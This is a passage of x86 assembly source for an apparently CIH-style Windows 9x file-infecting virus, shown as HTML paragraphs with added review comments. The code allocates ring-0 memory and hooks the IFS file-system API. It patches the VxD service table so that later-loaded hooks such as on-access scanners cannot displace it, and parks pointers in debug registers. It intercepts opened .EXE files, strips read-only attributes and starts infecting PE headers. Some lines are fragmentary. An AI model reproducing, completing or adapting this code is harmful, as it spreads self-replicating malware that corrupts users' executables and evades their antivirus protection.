      <P>push 000000001h ;</P>
      <P>push 000000002h ;</P>
      <P>int 20h ; VMMCALL _PageAllocate</P>
      <P>_PageAllocate = $ ;</P>
      <P>dd 00010053h ; Use EAX, ECX, EDX, and flags</P>
      <P>add esp, 08h*04h</P>
      <P> </P>
      <P>xchg edi, eax ; EDI = SystemMemory Start Addr</P>
      <P>s</P>
      <P> </P>
      <P>lea eax, MyVirusStart-@2[esi]</P>
      <P> </P>
      <P>iretd ; Return to Ring3 Initial Program</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Install My File System Api Hook *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>; Ring-0 installer. Registers FileSystemApiHook with the IFS manager, then</P>
      <P>; patches the VxD service-table entry of IFSMgr_InstallFileSystemApiHook so</P>
      <P>; that every later installer of a file-system hook (e.g. an on-access scanner</P>
      <P>; loaded after the virus) is routed through the InstallFileSystemApiHook</P>
      <P>; wrapper below, which keeps this hook in the chain.</P>
      <P>; In:  EDI = base of the allocated system-memory copy that holds the hook</P>
      <P>;      code (offsets are taken relative to @6, defined outside this view)</P>
      <P>;      ESI = base of the copy this routine itself executes from (@2-relative)</P>
      <P>; Out: DR0 = previous file-system hook returned by the IFS manager</P>
      <P>;      OldInstallFileSystemApiHook (in the EDI copy) = original service entry;</P>
      <P>;      the service-table slot now points at the wrapper.</P>
      <P>; Clobbers EAX, ECX, EDX, flags; never returns (jumps to ExitRing0Init).</P>
      <P>; NOTE(review): neither service call is checked for failure.</P>
      <P>InstallMyFileSystemApiHook:</P>
      <P> </P>
      <P>lea eax, FileSystemApiHook-@6[edi] ; EAX = runtime address of the hook handler</P>
      <P> </P>
      <P>push eax ; argument: hook procedure to install</P>
      <P>int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook</P>
      <P>IFSMgr_InstallFileSystemApiHook = $ ; label on the dword operand of the dynamic-link call</P>
      <P>dd 00400067h ; device 0040h (IFSMgr), service 0067h; Use EAX, ECX, EDX, and flags</P>
      <P> </P>
      <P>; The service returns the previously installed hook. It is parked in debug</P>
      <P>; register DR0 instead of a memory cell: a hardware debug register abused as</P>
      <P>; a global variable, which also overwrites any hardware breakpoint set in DR0.</P>
      <P>mov dr0, eax ; Save OldFileSystemApiHook Address</P>
      <P> </P>
      <P>pop eax ; EAX = FileSystemApiHook Address (the argument pushed above; the callee does not clean the stack)</P>
      <P> </P>
      <P>; Save Old IFSMgr_InstallFileSystemApiHook Entry Point.</P>
      <P>; NOTE(review): relies on Win9x VxD dynamic linking - after the int 20h above</P>
      <P>; has executed once, the VMM rewrites the int 20h/dd pair at this site into an</P>
      <P>; indirect call through the VxD service table, so the dword now holds the</P>
      <P>; address of the table slot. The mov (not lea) loads that slot address and the</P>
      <P>; following mov reads the real entry point through it; confirm against the VMM.</P>
      <P>mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] ; ECX = address of the service-table slot</P>
      <P>mov edx, [ecx] ; EDX = original entry point of the service</P>
      <P>mov OldInstallFileSystemApiHook-@3[eax], edx ; stash it in the data cell of the hook copy (EAX = @3 base)</P>
      <P> </P>
      <P>; Modify IFSMgr_InstallFileSystemApiHook Entry Point:</P>
      <P>; redirect the service-table slot to the wrapper. This is a system-wide</P>
      <P>; ring-0 hook - every VxD that later calls this service lands in our code.</P>
      <P>lea eax, InstallFileSystemApiHook-@3[eax] ; EAX = runtime address of the wrapper</P>
      <P>mov [ecx], eax</P>
      <P> </P>
      <P>cli ; interrupts off for the exit path; no sti here - presumably restored by the iretd ending ring-0 init (TODO confirm in ExitRing0Init)</P>
      <P> </P>
      <P>jmp ExitRing0Init ; defined outside this view</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Code Size of Merge Virus Code Section *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>; Assemble-time marker: the offset of this point within the segment.</P>
      <P>; By its name, the length of the virus code that gets merged into the host</P>
      <P>; image. The hook code and data that follow are addressed from EDI/EBX</P>
      <P>; relative to @3/@6 and so appear to execute from the allocated</P>
      <P>; system-memory copy instead (TODO confirm against the infection routine,</P>
      <P>; which is outside this view).</P>
      <P>CodeSizeOfMergeVirusCodeSection = offset $</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * IFSMgr_InstallFileSystemApiHook *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>; Wrapper installed in place of IFSMgr_InstallFileSystemApiHook by the</P>
      <P>; installer above. Reached by any VxD that installs a file-system API hook.</P>
      <P>; It removes FileSystemApiHook, forwards the caller's request to the original</P>
      <P>; service, then installs FileSystemApiHook again so that the virus hook is</P>
      <P>; always the most recently installed one (presumably to keep it ahead of the</P>
      <P>; caller's hook in the IFS manager's chain - TODO confirm the chain ordering).</P>
      <P>; Signature mirrors the service: one stack argument (hook procedure), caller</P>
      <P>; cleans the stack (ret carries no count), result in EAX.</P>
      <P>; In:  [ESP+4] = client's hook procedure</P>
      <P>; Out: EAX = the value the original service returned to the client</P>
      <P>;      DR0 = refreshed previous-hook pointer for FileSystemApiHook</P>
      <P>; Preserves EBX; clobbers ECX, EDX, flags plus whatever the service clobbers.</P>
      <P>; Position independent: finds its own address with call/pop because it runs</P>
      <P>; from the relocated system-memory copy.</P>
      <P>; NOTE(review): no locking - between the remove and the re-install the virus</P>
      <P>; hook is absent from the chain; neither service result is checked for failure.</P>
      <P>InstallFileSystemApiHook:</P>
      <P>push ebx</P>
      <P> </P>
      <P>call @4 ; pushes EIP so the next pop yields our own runtime address</P>
      <P>@4: ;</P>
      <P>pop ebx ; mov ebx, offset FileSystemApiHook</P>
      <P>add ebx, FileSystemApiHook-@4 ; EBX = runtime address of FileSystemApiHook (= @3 base)</P>
      <P> </P>
      <P>; Step 1: unhook ourselves first</P>
      <P>push ebx ; argument: hook to remove</P>
      <P>int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook</P>
      <P>IFSMgr_RemoveFileSystemApiHook = $ ; label on the dynamic-link dword</P>
      <P>dd 00400068h ; device 0040h (IFSMgr), service 0068h; Use EAX, ECX, EDX, and flags</P>
      <P>pop eax ; discard the argument (EAX is overwritten below)</P>
      <P> </P>
      <P>; Step 2: Call Original IFSMgr_InstallFileSystemApiHook</P>
      <P>; to Link Client FileSystemApiHook.</P>
      <P>; Stack here: [ESP] = saved EBX, [ESP+4] = return address, [ESP+8] = client's argument</P>
      <P>push dword ptr [esp+8] ; re-push the client's hook procedure</P>
      <P>call OldInstallFileSystemApiHook-@3[ebx] ; indirect call through the saved original entry point</P>
      <P>pop ecx ; discard the argument</P>
      <P> </P>
      <P>push eax ; keep the client's result (its previous hook) to hand back unchanged</P>
      <P> </P>
      <P>; Step 3: Call Original IFSMgr_InstallFileSystemApiHook</P>
      <P>; to Link My FileSystemApiHook again, after the client's</P>
      <P>push ebx ; argument: our own hook handler</P>
      <P>call OldInstallFileSystemApiHook-@3[ebx]</P>
      <P>pop ecx ; discard the argument</P>
      <P> </P>
      <P>; The service returns whatever now precedes us in the chain; refresh the copy</P>
      <P>; kept in DR0 (same debug-register abuse as the installer). FileSystemApiHook</P>
      <P>; presumably chains through DR0 - confirm in the handler, which runs past this view.</P>
      <P>mov dr0, eax ; Adjust OldFileSystemApiHook Address</P>
      <P> </P>
      <P>pop eax ; EAX = client's result</P>
      <P> </P>
      <P>pop ebx</P>
      <P> </P>
      <P>ret ; caller pops its own argument</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Static Data *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>; Saved original entry point of IFSMgr_InstallFileSystemApiHook (read out of</P>
      <P>; the VxD service table by InstallMyFileSystemApiHook above). Written once by</P>
      <P>; the installer and called through by the InstallFileSystemApiHook wrapper;</P>
      <P>; both address it as a negative offset from @3 (FileSystemApiHook), so it</P>
      <P>; travels with the relocated hook code. Left uninitialized (?): a call</P>
      <P>; through it before the installer has run would jump to garbage.</P>
      <P>OldInstallFileSystemApiHook dd ?</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * IFSMgr_FileSystemHook *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * IFSMgr_FileSystemHook Entry Point *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>FileSystemApiHook:</P>
      <P>@3 = FileSystemApiHook</P>
      <P> </P>
      <P>pushad</P>
      <P> </P>
      <P>call @5 ;</P>
      <P>je CallUniToBCSPath</P>
      <P> </P>
      <P>add al, 40h</P>
      <P>mov ah, ':'</P>
      <P> </P>
      <P>mov [esi], eax</P>
      <P> </P>
      <P>inc esi</P>
      <P>inc esi</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * UniToBCSPath *</P>
      <P>; *************************************</P>
      <P>; * This Service Converts *</P>
      <P>; * a Canonicalized Unicode Pathname *</P>
      <P>; * to a Normal Pathname in the *</P>
      <P>; * Specified BCS Character Set. *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>CallUniToBCSPath:</P>
      <P>push 00000000h</P>
      <P>push FileNameBufferSize</P>
      <P>mov ebx, [ebx+10h]</P>
      <P>mov eax, [ebx+0ch]</P>
      <P>add eax, 04h</P>
      <P>push eax</P>
      <P>push esi</P>
      <P>int 20h ; VXDCall UniToBCSPath</P>
      <P>UniToBCSPath = $</P>
      <P>dd 00400041h</P>
      <P>add esp, 04h*04h</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Is FileName '.EXE' !? *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>; cmp [esi+eax-04h], '.EXE'</P>
      <P>cmp [esi+eax-04h], 'EXE.'</P>
      <P>pop esi</P>
      <P>jne DisableOnBusy</P>
      <P> </P>
      <P>IF DEBUG</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Only for Debug *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>; cmp [esi+eax-06h], 'FUCK'</P>
      <P>cmp [esi+eax-06h], 'KCUF'</P>
      <P>jne DisableOnBusy</P>
      <P> </P>
      <P>ENDIF</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Is Open Existing File !? *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>; if ( NotOpenExistingFile )</P>
      <P>; goto DisableOnBusy</P>
      <P>cmp word ptr [ebx+18h], 01h</P>
      <P>jne DisableOnBusy</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Get Attributes of the File *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>mov ax, 4300h</P>
      <P>int 20h ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P>IFSMgr_Ring0_FileIO = $</P>
      <P>dd 00400032h</P>
      <P> </P>
      <P>jc DisableOnBusy</P>
      <P> </P>
      <P>push ecx</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Get IFSMgr_Ring0_FileIO Address *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]</P>
      <P>mov edi, [edi]</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Is Read-Only File !? *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>test cl, 01h</P>
      <P>jz OpenFile</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Modify Read-Only File to Write *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>mov ax, 4301h</P>
      <P>xor ecx, ecx</P>
      <P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Open File *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>OpenFile:</P>
      <P>xor eax, eax</P>
      <P>mov ah, 0d5h</P>
      <P>xor ecx, ecx</P>
      <P>xor edx, edx</P>
      <P>inc edx</P>
      <P>mov ebx, edx</P>
      <P>inc ebx</P>
      <P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P> </P>
      <P>xchg ebx, eax ; mov ebx, FileHandle</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Need to Restore *</P>
      <P>; * Attributes of the File !? *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>pop ecx</P>
      <P> </P>
      <P>pushf</P>
      <P> </P>
      <P>test cl, 01h</P>
      <P>jz IsOpenFileOK</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Restore Attributes of the File *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>mov ax, 4301h</P>
      <P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Is Open File OK !? *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>IsOpenFileOK:</P>
      <P>popf</P>
      <P> </P>
      <P>jc DisableOnBusy</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Open File Already Succeed. ^__^ *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>push esi ; Push FileNameBuffer Address to Stack</P>
      <P> </P>
      <P>pushf ; Now CF = 0, Push Flag to Stack</P>
      <P> </P>
      <P>add esi, DataBuffer-@7 ; mov esi, offset DataBuffer</P>
      <P> </P>
      <P>; ***************************</P>
      <P>; * Get OffsetToNewHeader *</P>
      <P>; ***************************</P>
      <P> </P>
      <P>xor eax, eax</P>
      <P>mov ah, 0d6h</P>
      <P> </P>
      <P>; For Doing Minimal VirusCode's Length,</P>
      <P>; I Save EAX to EBP.</P>
      <P>mov ebp, eax</P>
      <P> </P>
      <P>xor ecx, ecx</P>
      <P>mov cl, 04h</P>
      <P>xor edx, edx</P>
      <P>mov dl, 3ch</P>
      <P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P> </P>
      <P>mov edx, [esi]</P>
      <P> </P>
      <P>; ***************************</P>
      <P>; * Get 'PE\0' Signature *</P>
      <P>; * of ImageFileHeader, and *</P>
      <P>; * Infected Mark. *</P>
      <P>; ***************************</P>
      <P> </P>
      <P>dec edx</P>
      <P> </P>
      <P>mov eax, ebp</P>
      <P>call edi ; VXDCall IFSMgr_Ring0_FileIO</P>
      <P> </P>
      <P>; ***************************</P>
      <P>; * Is PE !? *</P>
      <P>; ***************************</P>
      <P>; * Is the File *</P>
      <P>; * Already Infected !? *</P>
      <P>; ***************************</P>
      <P> </P>
      <P>; cmp [esi], '\0PE\0'</P>
      <P>cmp dword ptr [esi], 00455000h</P>
      <P>jne CloseFile</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * The File is ^o^ *</P>
      <P>; * PE(Portable Executable) indeed. *</P>
      <P>; *************************************</P>
      <P>; * The File isn't also Infected. *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Start to Infect the File *</P>
      <P>; *************************************</P>
      <P>; * Registers Use Status Now : *</P>
      <P>; * *</P>
      <P>; * EAX = 04h *</P>
      <P>; * EBX = File Handle *</P>
      <P>; * ECX = 04h *</P>
      <P>; * EDX = 'PE\0\0' Signature of *</P>
      <P>; * ImageFileHeader Pointer's *</P>
      <P>; * Former Byte. *</P>
      <P>; * ESI = DataBuffer Address ==&gt; @8 *</P>
      <P>; * EDI = IFSMgr_Ring0_FileIO Address *</P>
      <P>; * EBP = D600h ==&gt; Read Data in File *</P>
      <P>; *************************************</P>
      <P>; * Stack Dump : *</P>
      <P>; * *</P>
      <P>; * ESP =&gt; ------------------------- *</P>
      <P>; * | EFLAG(CF=0) | *</P>
      <P>; * ------------------------- *</P>
      <P>; * | FileNameBufferPointer | *</P>
      <P>; * ------------------------- *</P>
      <P>; * | EDI | *</P>
      <P>; * ------------------------- *</P>
      <P>; * | ESI | *</P>
      <P>; * ------------------------- *</P>
      <P>; * | EBP | *</P>
      <P>; * ------------------------- *</P>
